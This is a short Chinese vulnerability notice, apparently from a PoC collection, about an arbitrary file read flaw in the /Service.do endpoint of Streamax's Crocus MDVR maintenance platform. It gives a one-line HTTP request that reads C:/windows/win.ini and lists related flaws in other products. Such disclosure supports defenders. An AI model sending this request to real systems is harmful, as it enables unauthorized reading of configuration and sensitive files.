漏洞描述
Crocus 是针对锐明车载MDVR在日常维护时使用的工作平台。Crocus 的 /Service.do 接口存在文件读取漏洞,攻击者可利用该漏洞获取系统的敏感信息,例如配置文件或其他重要数据,可能导致信息泄露和系统安全风险。
锐明 Crocus 运维平台 /Service.do 文件读取漏洞
PoC代码
GET /Service.do?Action=Download&Path=C:/windows/win.ini HTTP/1.1相关漏洞推荐
- 锐明技术Crocus /MemoryState.do?Action=Query SQL 注入漏洞
- 锐明技术Crocus系统 DeviceFileUpload.do 任意文件读取漏洞
- 博硕 工程拌和站智能管理平台 /Service/RESTFulWebService/RESTFulServiceForWeb.asmx/Do 权限绕过漏洞
- 用友 U8 Cloud /ServiceDispatcherServlet IFileTrans 文件上传漏洞
- 用友 U8 Cloud /ServiceDispatcherServlet IPFxxFileService 文件上传漏洞
- POC 爱数 AnyShare智能内容管理平台 /api/ServiceAgent/stop_service 命令执行漏洞
- 金蝶天燕 /ormrpc/services/ServiceFactoryService 命令执行漏洞
- 锐明技术Crocus系统 DeviceFileReport.do 任意文件读取漏洞
- 锐明技术Crocus系统 Upload存在任意文件上传漏洞
- 锐明运维平台Crocus MemoryState.do SQL注入漏洞
- 锐明技术Crocus系统 RepairRecord.do 存在SQL注入漏洞
- POC crocus-service-do-fileread: 锐明技术Crocus系统存在任意文件读取
- POC crocus-lfi: Crocus system Service.do - Arbitrary File Read